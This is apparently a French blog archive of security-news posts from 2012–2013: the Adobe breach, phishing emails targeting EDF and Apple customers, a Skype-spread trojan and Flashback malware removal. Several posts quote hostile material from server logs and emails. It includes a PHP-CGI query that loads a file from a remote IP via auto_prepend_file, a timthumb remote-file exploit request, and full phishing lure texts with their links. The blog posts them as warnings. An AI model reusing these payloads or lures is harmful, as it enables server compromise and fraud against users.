piratage

09-10-2013

Changez votre mot de passe de votre compte adobe suite à un piratage

Alors vous voulez changer votre mot de passe de votre compte adobe ? quelle bonne idée, surtout que 3 millions de comptes clients viennent d'être piratés

Et bien allez sur ce lien

http://www.adobe.com/go/passwordreset

Saisissez votre adresse email lié à votre compte

Vous recevrez par la suite un mail qui vous proposera un lien pour changer votre mot de passe

cs-auto@adobe.com

Adobe Systems Incorporated Reset Your Adobe ID Password

Il suffit ensuite de saisir deux fois votre mot de passe ...

Dean

09-10-2013

Important Password Reset Information : si si adobe a été piraté …

Adobe Customer Care - Important Password Reset Information (email@mail.adobesystems.com)

Et oui ça arrive à tout le monde, personne n'est complètement à l'abris du piratage ...
Cette fois ci c'est au tour d'adobe .

Pas loin de 3 millions de comptes piratés chez adobe (identifiants - mots de passe - numéros de cartes de crédit)

Adobe vous demande de réinitialiser les mots de passe de comptes concernés par cette attaque.

Pas de bol alors si vous recevez ce mail, ça veut dire que votre compte est concerné...

Par sécurité il est conseillé de modifier les mots de passe de vos autres comptes ayant le même identifiant/mot de passe

Adobe Customer Care

Important Password Reset Information

We recently discovered that an attacker illegally entered our network and may have obtained access to your Adobe ID and encrypted password. We currently have no indication that there has been unauthorized activity on your account.

To prevent unauthorized access to your account, we have reset your password. Please visit www.adobe.com/go/passwordreset to create a new password. We recommend that you also change your password on any website where you use the same user ID or password. In addition, please be on the lookout for suspicious email or phone scams seeking your personal information.

We deeply regret any inconvenience this may cause you. We value the trust of our customers and we will work aggressively to prevent these types of events from occurring in the future. If you have questions, you can learn more by visiting our Customer Alert page, which you will find here.
Adobe Customer Care

Ce n'est pas du spam, ce n'est pas du phishing ...

Dean

08-10-2013

Faille php : /?-dsafe_mode%3dOff…61.19.253.26 etc … tentative de hack sur serveur

Une vulnérabilité php permet l'éxécution de code php distant

La requête envoyée pour tester la faille.

/?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt
php -dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://81.17.24.83/send.txt

Cette vulnérabilité permet l'exécution du fichier echo.php stocké sur le serveur avec ip 61.19.253.26

Cette faille ne touche que les serveurs dont php fonctionne en mode CGI (avant 5.3.12 et 5.4.x avant 5.4.2)

Vérifiez votre version php:
La commande pour connaitre sa version php sur linux - debian - ubuntu server

php --version

Pour bloquer rapidement l'adresse à partir du serveur ip par iptable:
115.248.250.105 correspond à l'adresse ip utilisée pour détecter la faille ...

iptables -A INPUT -s 115.248.250.105 -j DROP

30-09-2013

Concours de hack pour contourner la protection Touch ID (lecteur biométrique) iphone 5S

Le système Touch ID de l'iphone 5S permet d'utiliser les empruntes digitales du propriétaire pour ajouter une couche de protection au smartphone (en plus du code pin ...)

Apple se voulant rassurant sur la fiabilité de son nouvel iphone 5s vient a lancé un concours.

Quoi de mieux que de lancer un défi aux hackeurs ?

"Is Touch ID hacked yet ?" http://istouchidhackedyet.com

Evidemment le système a été hacké ... par Chaos Computer Club en utilisant une copie de l'empreinte digital d'un doigt

Is Touch ID hacked yet ?

23-09-2013

Le capteur biométrique (à emprunte digital) de l’iPhone 5S contournable …

La sécurité du nouvel iPhone 5S est mise en avant par apple avec sont système d'identification avec un capteur biométrique.

Ce système a été démontré contournable par l'équipe de Chaos Computer Club grâce à du latex ...

Un leurre en latex avec les empruntes de doigts dessus (imprimés à 1200dpi), placé au bout du doigt, vidéo à l'appui démontre la vulnérabilité de ce système.

Cette solution risque de donner des mauvaises idées en ce qui concerne d'autres appareils qui utilisent ce même système (pc portable etc...)

19-09-2013

Faille de sécurité critique sur ie internet explorer 8 et 9 : 17/09/2013

Microsoft vient d'annoncer une faille critique de sécurité touchant les versions 8 et 9 du navigateur internet explorer. (et peut-être toutes les autres aussi...)
Faille de type 0day

Cette faille permettrait l'exécution de code malveillant à distance (par utilisation de malware...)

Solution:
Un patch temporaire est à appliquer manuellement (https://support.microsoft.com/kb/2887505) en attendant une solution (quand?)

http://blogs.technet.com/
17 Sep 2013 10:00 AM
Today we released Security Advisory 2887505 regarding an issue that affects Internet Explorer. There are only reports of a limited number of targeted attacks specifically directed at Internet Explorer 8 and 9, although the issue could potentially affect all supported versions. This issue could allow remote code execution if an affected system browses to a website containing malicious content directed towards the specific browser type.

Source:

http://blogs.technet.com/b/msrc/archive/2013/09/17/microsoft-releases-security-advisory-2887505.aspx

http://www.zdnet.fr/actualites/microsoft-alerte-d-une-faille-dans-internet-explorer-actuellement-exploitee-39794125.htm

04-07-2013

WordPress hack (picline - nihana - roy - by appstore ) etc….

There are iTunes phishing pages at
wp-content/Identification/
wp-content/Identification/inscription/index.php
plugins/apple-espace-clients-Fr-id8732KE902KCN393872928/
plugins/apple-espace-clients-Fr-id8732KE902KCN393872928/inscription/index.php
There are hacker tools and files at
wp-content/plugins/1.php (29 Jun 13 1747)
wp-content/plugins/picline.php
wp-content/picline.php
wp-content/plugins/By-Appstore-Fr-service-Verification-ID00293934782847GT.zip
wp-content/plugins/nihaha.php
wp-content/plugins/roy.asp

29-04-2013

ça me gave ces tentatives d’intrusion: 27.159.214.5

Le pire c'est que ça fait trois jours selon les logs ...

/?page=login&cmd=register
/index.php?page=en_Signup
/?do=/user/register/
/signup.php
/index.php?action=registernew
/?option=com_registration&task=register
/index.php?option=com_registration&task=register
/profile.php?mode=register&agreed=true&coppa=0
/ucp.php?mode=register
/index.php?app=core&module=global&section=login
/index.php?act=Login&CODE=00
/YaBB.cgi/
/join.php
/YaBB.pl/
/registration_rules.asp?FID=0

31-01-2013

Votre prélèvement bancaire a été refusée par votre banque EDF: Phishing attention

EDF - Phishing - hameçonnage Arnaque
Votre prélèvement bancaire a été refusée par votre banque.

BC-DP_P-AEL-AUTOMATE@edf.fr via eigbox.net

Chèr(e) Client(e),

Votre prélèvement bancaire a été refusée par votre banque.Afin de régulariser votre situation veuillez vous refferez ci-dessous:

Cliquez ici pour résoudre ce problème (pgravelandbestratingen.nl/logs/fr)

Lors d'echec de regularisation de votre situation, nous procèderons à la suspension de votre fourniture d'energie.Cette intervention vous sera facturée

Merci de votre confiance

Dominique REMOND
Directeur Service Client

Return-Path:

Sources:
lemonde.fr
Les clients EDF sont la cible d'une tentative d'escroquerie géante ....

Phishing : vaste campagne visant les abonnés EDF
Arnaque à très grand échelle : des faux e-mails envoyés à des centaines de milliers de clients d'EDF

12-11-2012

regler votre facture N° FRXXXXXXXX : service.client@edf.fr : phishing

regler votre facture N° FRXXXXXXXX : phishing

Return-Path:
Received: from smtp01.atlngahp.sys.nuvox.net
Received: from edf.fr (216.199.211.105.nw.nuvox.net [216.199.211.105]) by smtp01.atlngahp.sys.nuvox.net (8.13.1/8.13.1) with ESMTP id qAAAPJ7N014109
Message-ID: <20121110053015.A5EEED8199889F46@edf.fr>

Cher(e) EDF Client(e)
Votre paiement à été refusée par votre établissement bancaire en raison d'un problème technique sur le système de prélèvement automatique,
Pour eviter la pénalités de retard ,nous vous donnons la possibilité de payer en ligne en utilisant votre carte bancaire,
Afin de régler votre facture N° FR78441012 ,cliquer sur le lien ci-dessous :
‹‹ Régler votre facture ››
Lors d'échec de régularisation de votre situation , nous procéderons à la suspension de fourniture d'énergie ,Cette intervention vous sera facturée .

Merci de votre confiance .

15-10-2012

Vous disposez désormais du « journal » Facebook, un nouveau type de profil => phishing ?

Vous disposez désormais du « journal » Facebook, un nouveau type de profil

notification+kjdmh_ku7jvd@facebookmail.com

Vous disposez désormais du « journal » Facebook, un nouveau type de profil.
Le journal est une collection de toutes vos photos, publications et expériences qui vous représentent. Accédez à Facebook pour choisir votre photo de couverture, ajouter des photos et des événements importants de votre vie, ainsi que d’autres contenus que vous aimez.

Dans tous les cas si vous êtes dans le doutes mettez à la poubelle !!

10-10-2012

http://goo.gl/Ya6Se?image skype => cheval de troie

http://goo.gl/Ya6Se?image skype - Skype_todaysdate.zip

Ne cliquez pas sur le lien, il contient un fichier zip qui dissimule un troyen - trojan (cheval de troie)

Troyen ou cheval de troie:
Logiciel conçu pour exécuter des actions à l’insu d'un utilisateur (prise de contrôle à distance...)

Plus d'infos:
http://www.zenbien.com/skype-attention-malware-troyen-trojan

- проблема http://goo.gl/Ya6Se?
- lol is this your new profile pic? http://goo.gl/ya6se?image=
- co to jest http://goo.gl/ya6se?image
- crfqg http://goo.gl/ya6se?
- hey c’est votre nouvelle photo de profil

TROJAN !!!


Pour nettoyer efficacement windows des troyens-trojan:
- Malwarebytes, un anti spyware/troyen (http://fr.malwarebytes.org, "http://fr.malwarebytes.org/mbam-download.php)
- Hitman PRO (http://www.surfright.nl/en/hitmanpro, http://www.surfright.nl/en/downloads/)
- Avira (si vous n'avez pas d'anti virus, http://www.avira.com/fr/avira-free-antivirus, http://www.01net.com/telecharger/windows/Securite/antivirus-antitrojan/fiches/13198.html)
- Microsoft Security Essentials (http://windows.microsoft.com/fr-FR/windows/products/security-essentials)
- Comodo Cleaning Essentials (http://www.comodo.com/business-security/network-protection/cleaning_essentials.php)
- CCleaner (http://www.piriform.com/ccleaner, http://www.filehippo.com/download_ccleaner)

10-10-2012

Skype, attention malware, troyen trojan

Un ver informatique essai de se propager en exploitant l'API skype.
Un message spam affiche (toutes les 20 minutes) un lol accompagné d'un lien de téléchargement (fichier zip Skype_todaysdate.zip)
Le fichier contient un cheval de troie - troyen ou trojan....

Ce troyen permet de prendre le contrôle d'un ordinateur sur Windows.

Source: génération NT

L'ordinateur infecté pourrait rejoindre les rangs d'un botnet (Dorkbot)
Possibilité de tomber sur une attaque de type ransomware, demande de rançon
L'utilisateur est informé que ses fichiers ont été cryptés et il doit payer de 200 dollars sous 48 heures sous peine de suppression.
lol is this your new profile pic? http://goo.gl/Ya6Se?image=username

- C2C service

Info sur skype:
http://heartbeat.skype.com/2012/10/malicious_activity_in_skype_ch.html

We take the user experience very seriously, particularly when it comes to security. We are aware of some recent reports of malicious activity and are working quickly to take appropriate action to protect users. We continue to recommend upgrading to the latest version of Skype and applying updated security features on your computer. Additionally, following links - even when from your contacts - that look strange or are unexpected is not advisable

04-10-2012

timthumb.php src img.youtube.com.alsahiltextiles.com/mct.php

Une tentative d'exploitation de faille timthumb.php (plugin wordpress)

Le plugin Timthumb de wordpress permet de redimensionner les images automatiquement.
Celui ci comporte une faille exploitable ...

GET /wp-content/plugins/wordpress-gallery-plugin/timthumb.php?src=http://img.youtube.com.alsahiltextiles.com/mct.php

17-07-2012

Apple Store : une application SPAM = Find and Call

Selon Kaspersky l’application Find and Call présente sur l’App Store récupère les contacts à l’insu de l’utilisateur puis envoie des courriels et SMS publicitaires à tous les destinataires.
Kaspersky dénonce la présence de l’application Find and Call qui transfert sur ses serveurs les contacts du carnet d'adresse puis envoie ensuite des messages publicitaires à toutes les personnes en affichant le numéro du mobile source pour leurrer les destinataires.

Si Find and Call ne représente pas une réelle menace, son fonctionnement est bien celui d’un logiciel malveillant.

Source:
securelist.com
businessmobile.fr

13-04-2012

Retirer-supprimer Flashback le cheval de Troie mac : apple fournit son logiciel enfin

Retirer-supprimer Flashback le cheval de Troie mac : apple fournit son logiciel enfin

Apple vient de diffuser un logiciel, enfin une mise à jour plutôt de suppression de Flashback et ses variantes connues, ainsi qu'une désactivation d'une fonction du plugin java par prévention.

Cette solution de sécurité d’Apple permet aux utilisateurs de protéger leur système Mac OS X sans avoir à installer un antivirus (patch kaspersky, f-secure avec Flashback Removal Tool etc...)

Nb:ce correctif ne vous protège pas des prochaines variantes, il vous faudra dans ce cas appliquer les dernières mises à jour du correctif.
Aussi, les estimations de postes infectés déclarées par apple seraient inférieures à celles annoncées par les éditeurs d'antivirus (Dr Web ...) qui serait de 600 000

Comment faire la mise à jour de suppression flashback?:

=> Menu pomme (icone de la pomme!) => Mise à jour logiciel (en haut à gauche)

Lien:
support.apple.com : support.apple.com/kb/HT5242?viewlocale=fr_FR&locale=fr_FR
news.cnet.com : apples-flashback-malware-remover-now-live
zdnet.fr : flashback-apple-diffuse-son-logiciel-de-suppression-du-malware

13-04-2012

Apple renforce sa sécurité des comptes: 3 questions secrètes = phishing ?

Apple renforce sa sécurité des comptes: 3 questions secrètes = phishing ?

Apple dans le carde d'une campagne de sécurité demande aux utilisateurs avec compte iThunes de créer trois questions et réponses de sécurité, d'ajouter une nouvelle adresse email...
Une fois ces réponses faites, l'achat et le téléchargement de contenu devient possible.

Aujourd'hui, les spams, tentatives de phishing, hameçonage, scams, vol de compte etc ... sont tellement courant que tout le monde se méfie.

L'action d' Apple devient donc suspecte !!!
La page de discussion (https://discussions.apple.com/___sbsstatic___/maintenance.html?start=0&tstart=0) est submergée de questions en ce moment, au point de mettre le forum hors service

Sources:
thenextweb.com : apple-enhances-apple-id-account-security-in-itunes-and-on-ios-devices-leaving-users-confused
macplus.net : apple-id-apple-renforce-la-securite

Thank you.

You’ve taken the added security step and provided a rescue email address. Now all you need to do is verify that it belongs to you.

The rescue address you have given us is xxx@xxx.com. Just click the link below to verify, sign in using your Apple ID and password, then follow the prompts.

The rescue email address is dedicated your security and allows Apple to get in touch if any account questions come up, such as the need to reset or change your security questions. As promised, Apple will never send you any announcements or marketing messages to this address.

We'll be back soon
We are busy updating Apple discussion for you and will be back shortly

5 Commentaires

12-04-2012

Affaire virus Flashback, apple laisse les éditeurs faire le travail à sa place.

Affaire virus Flashback, apple laisse les éditeurs faire le travail.

Depuis quelques jours le cheval de troie (troyen-trojan) flashback fait trembler les utilisateurs MAC

Une page sur le site apple recommande juste de désactiver Java qui contient une faille de sécurité, sans fournir plus d'informations sur un correctif.

En même temps les éditeurs proposent des solutions de détection et de suppression du virus (et se font une pub en même temps), les plus connus étant f-secure et kaspersky.

Au passage, un bourde d'apple qui a demandé à un bureau d'enregistrement de domaine russe (reggi.ru) de couper un domaine utilisé soit disant comme serveur de contrôle et de commande, ce serveur est en fait utilisé par Dr Web pour recenser les machines infectées et tenter de mieux comprendre son fonctionnement.

M. Sharov (Dr Web) déplore l’absence de réponse d’Apple aux mises en garde de sa firme qui a partagé « toutes ses données avec eux ». Sans obtenir de réponse...

La meilleur solution manuelle (plus délicat) pour détecter et supprimer le virus provient de f-secure
http://www.f-secure.com/v-descs/trojan-downloader_osx_flashback_i.shtml

La meilleur solution logiciel pour détecter et supprimer le virus provient de kaspersky
http://flashbackcheck.com/

Liens:
01net.com : malware-flashback-apple-prepare-son-patch-et-contacte-les-fai

06-04-2012

Supprimer-Enlever BackDoor Flashback sur mac OS X : Cheval de troie

Supprimer-Enlever BackDoor Flashback sur mac OS X : Cheval de troie

f-secure, une société finlandaise spécialisée dans la sécurité informatique nous propose des solutions pour détecter et supprimer le BackDoor Flashback des postes mac-apple (os x) infectés
Attention, les manipulation sont à faire par des personnes compétentes.

En France, la probabilité d'être infecté est de 0,56% , actuellement 3000 postes sont touchés (20 minutes)

Voici une capture en provenance de f-securede la méthode à suivre pour détecter et supprimer le troyen

Manual Removal

Caution: Manual disinfection is a risky process; it is recommended only for advanced users. Otherwise, please seek professional technical assistance. F-Secure customers may also contact our Support.

1. Run the following command in Terminal: //exécuter la ligne de code ci-dessous dans un terminal os x

defaults read /Applications/Safari.app/Contents/Info LSEnvironment

2. Take note of the value, DYLD_INSERT_LIBRARIES
3. Proceed to step 8 if you got the following error message://passez à l'étape 8 si vous rencontrez le message suivant

"The domain/default pair of (/Applications/Safari.app/Contents/Info, LSEnvironment) does not exist"

4. Otherwise, run the following command in Terminal:

grep -a -o '__ldpath__[ -~]*' %path_obtained_in_step2%

5. Take note of the value after "__ldpath__"
6. Run the following commands in Terminal (first make sure there is only one entry, from step 2):

sudo defaults delete /Applications/Safari.app/Contents/Info LSEnvironment

sudo chmod 644 /Applications/Safari.app/Contents/Info.plist

7. Delete the files obtained in steps 2 and 5
8. Run the following command in Terminal:

defaults read ~/.MacOSX/environment DYLD_INSERT_LIBRARIES

9. Take note of the result. Your system is already clean of this variant if you got an error message similar to the following:

"The domain/default pair of (/Users/joe/.MacOSX/environment, DYLD_INSERT_LIBRARIES) does not exist"

10. Otherwise, run the following command in Terminal:

grep -a -o '__ldpath__[ -~]*' %path_obtained_in_step9%

11. Take note of the value after "__ldpath__"
12. Run the following commands in Terminal:

defaults delete ~/.MacOSX/environment DYLD_INSERT_LIBRARIES

launchctl unsetenv DYLD_INSERT_LIBRARIES

13. Finally, delete the files obtained in steps 9 and 11.

Bon je ferais une petite traduction plus tard...

Liens:
- f-secure.com : v-descs/trojan-downloader_osx_flashback_i
- pcinpact.com : osx-trojan-flashback
- 20minutes.fr : high-tech/apple/912093-apple-cheval-troie-infecte-600000-macs

06-04-2012

BackDoor Flashback 39 : un cheval de troie (troyen-trojan) qui fait peur aux mac-apple OS X

BackDoor Flashback 39 : un cheval de troie (troyen-trojan) qui fait peur aux mac-apple OX X

Les mac, ordinateurs apple (macbook, powermac sur système Mac OS X) ne sont plus à l'abris de virus...
BackDoor Flashback 39 un cheval de troie (troyen-trojan) a infecté plus de 550 000 postes apple selon l'éditeur d'antivirus russe Dr.Web.

Ce virus utilise trois vulnérabilités (faille de l'environnement java installés dessus), exploitable par code javascript.

Prévention:
Java a publié une mise à jour pour éviter l'infection, éviter ne veut pas dire retirer.

Correction:
- www.pcinpact.com : osx-trojan-flashback
- www.f-secure.com : trojan-downloader_osx_flashback

Conclusion:
Pc ou mac, vous n'êtes jamais à l'abris d'intrusion.
Éteignez vos ordinateurs, et allez faire du sport !!! (à moins que vous ayez aussi attrapé le virus de la grippe...)

Liens:

- Le Point: un-demi-million-de-mac-infectes-la-fin-d-un-mythe
- Le Monde : les-mac-d-apple-seraient-vises-par-une-attaque-informatique
- 01net.com : le-botnet-flashback-met-a-mal-le-sentiment-d-invulnerabilite-sur-mac